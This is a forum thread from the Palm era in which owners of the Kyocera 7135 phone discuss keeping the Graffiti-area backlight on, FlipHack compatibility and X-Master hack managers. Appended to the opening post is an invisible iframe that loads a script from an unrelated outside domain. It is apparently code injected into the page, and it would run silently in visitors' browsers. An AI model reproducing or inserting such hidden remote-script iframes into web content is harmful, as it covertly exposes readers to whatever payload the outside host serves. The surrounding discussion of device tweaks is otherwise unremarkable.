+ Reply to Thread

graffiti area backlight

Is there a way to have the backlight for the graffiti area not turn off? I find myself losing the home silk screen button when using my 7135 in the dark.

I assume that this also means keeping the keypad lit, but I'm pretty sure I can live with that.

thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: graffiti area backlight

Originally posted by cranqbear
    Is there a way to have the backlight for the graffiti area not turn off? I find myself losing the home silk screen button when using my 7135 in the dark.

I assume that this also means keeping the keypad lit, but I'm pretty sure I can live with that.

thanks.
    None that I have found, but it will turn back on with any press of any of the phone keys. I use the CLR button since it doesn't have any effect in many palm applications, and where it does, it is minor (just issues a backspace).

Alan

I have wondered the same thing, and have not found a way to have it always stay on. I like Alan's idea of the using the clear button... except it's kind of hard to find in the dark I use my 7135 before I go to sleep some nights (ok, pretty much every night) and most of the time I have a data connection alive... which should mean that if I have the dialpad set to be always on during calls the graffiti area should also stay lit up... but I'm not sure if that's definitely the case, but plan to keep a closer eye on that. Maybe somebody else has already tested that theory?
    Please visit my picture site: Robert-O-Rama :)

Never involved in a flame war! sputnik's Avatar
    this is just begging for a hack...
    now that i've said that, does hackmaster still work?

i haven't used a Palm since the III, but i fondly remember all of my hacks

anxiously awaiting the day when i can buy the damn phone, and not have to live vicariously through everyone else that already has one
    _______
    Spu|nik VZW Kyo 7135 / VZW XV6600 / Sprint Mogul / Sprint Touch Pro / Sprint Touch Pro 2 / Apple iPhone 4 / ???

Originally posted by sputnik
    this is just begging for a hack...
    now that i've said that, does hackmaster still work?
    I haven't seen anybody say hacks won't work. I have X-Master installed on my 7135, and a few hacks... but none of them actively running (I've always been a bit afraid of hack, and haven't yet found any necessary to use!)
    Please visit my picture site: Robert-O-Rama :)

Hacks work. Whether a hack can get to the phone hardware in this case depends on hooks, I presume, in the software development kit. I'm no developer so I don't know.

I have X-Master installed. I regularly use EasyLaunch (can't give up my Memo and ToDo buttons, but want the web and phone ones, too!), and have also used ClearHack, NoLinesHack, and FlipHack, all without incident.

Speaking of which, I saw on an old thread a reference to FlipHack causing some trouble on the 6035, but couldn't find a description of what. Anyone who was around back then recall? Thanks!

Until a hack comes along, I have found that closing the flip partially (90 degrees works) illuminates the key pad and graffiti area from the light of the main screen. Not perfect, but for me is better than finding and hitting the clr button.:angel
    If at first you don't succeed, don't try sky diving.

turbocat,
    I was one of the very first to try fliphack on the 6035 when it first launched and it never worked.

I eventually posted about it on 5/15/01 in this thread...
    http://www.smartphonesource.com/vbul...light=fliphack

I also tried it on my 7135 when I got it, to the same avail.

Are you saying that it works on your 6035 and 7135?!?
    ~'kito
    pdaPhoneHome Moderator

Markito, we haven't tried it on the 6035 yet-- maybe we can do that tonight. For the 7135, yes indeed, it works on mine.

For the vast majority of applications, they function perfectly happily sideways. (All the text ones I tried, including Snapper, HandyShopper, Khroma, as well as WordSmith, DrawIt, Tetris, some other games, are fine.) A few of what I consider graphics-capable applications, such as QuickOffice, Blazer, EIS, and the MP3 Player, decide that they'd much rather have things their way, and turn the screen back to normal orientation. (The MP3 Player, amusingly, after it sits there Creating List sideways.) One, PhotoSuite, complains that it doesn't like the screen data, turns it back, and then exits. But going back in once it's normal is fine. And OmniRemote didn't like it-- sat there saying Please Wait forever. (It didn't care if the hack was enabled, just wanted the screen where it expected it.)

I wonder if other installed hacks, or which hack-master you're using, makes a difference?

Just wanted to update-- I tried FlipHack on our 6035, with no luck. I get the same error message as Markito, about it being untested on the PalmOS version, and then not being able to find the data.

The version I have which is working on the 7135, is v 1.1, dated 3/18/01.

Edit -- And the version of X-Master I am running is 1.5, dated 10/13/2002.